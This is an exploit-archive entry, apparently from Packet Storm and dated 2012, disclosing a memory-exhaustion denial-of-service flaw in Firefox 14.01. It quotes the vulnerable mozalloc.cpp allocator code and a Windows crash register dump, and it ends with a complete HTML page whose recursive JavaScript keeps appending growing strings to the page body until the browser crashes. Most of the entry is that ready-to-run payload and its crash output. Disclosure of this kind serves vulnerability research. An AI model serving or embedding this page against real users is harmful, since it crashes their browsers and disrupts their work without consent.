Mozilla Firefox 14.01 Denial Of Service

2012-08-17T00:00:00
ID PACKETSTORM:115648
Type packetstorm
Reporter Jean Pascal Pereira
Modified 2012-08-17T00:00:00

Description

                                        
                                            `<!--  
  
---------------------------------------------------  
Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit  
---------------------------------------------------  
  
Credit: Jean Pascal Pereira <pereira@secbiz.de>  
  
Description:  
  
Mozilla Firefox is prone to a memory exhaustion vulnerability.  
The issue has been tested on Firefox 14.01, prior versions may also be affected.  
  
mozalloc.cpp, line 184:  
  
moz_xposix_memalign(void **ptr, size_t alignment, size_t size)  
{  
int err = posix_memalign(ptr, alignment, size);  
if (UNLIKELY(err && ENOMEM == err)) {  
  
mozalloc_handle_oom();  
return moz_xposix_memalign(ptr, alignment, size);  
}  
// else: (0 == err) or (EINVAL == err)  
return err;  
}  
  
A crafted JavaScript leads the application to crash.  
  
Stacktrace (Windows 7 SP1):  
  
EAX 00000000  
ECX 5D923896 MSVCR100.5D923896  
EDX 00000003  
EBX 7FB00000 UNICODE "xxxxxxxxx [...]"  
ESP 002BB7F8  
EBP 002BB85C  
ESI 5D8D1EC6 MSVCR100.__p__iob  
EDI 5D92379C MSVCR100.fputs  
EIP 73FC1999 mozalloc.73FC1999  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 0 CS 001B 32bit 0(FFFFFFFF)  
A 0 SS 0023 32bit 0(FFFFFFFF)  
Z 0 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 003B 32bit 7FFDF000(C000)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)  
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)  
ST0 empty 1.0000000000000000000  
ST1 empty 0.1085754583206562651  
ST2 empty -0.0696429635909516231  
ST3 empty 86.763962149620056150  
ST4 empty 31200.200000000000730  
ST5 empty 1.3451474216221712500e+15  
ST6 empty 1.0390856000000000000e+10  
ST7 empty 0.0  
3 2 1 0 E S P U O Z D I  
FST 0022 Cond 0 0 0 0 Err 0 0 1 0 0 0 1 0 (GT)  
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
-->  
  
<html>  
<head>  
<title></title>  
</head>  
<body></body>  
<script>  
function e(x)  
{  
document.body.innerHTML += x;  
e(x + 'x');  
};  
  
e('x')  
</script>  
</html>  
`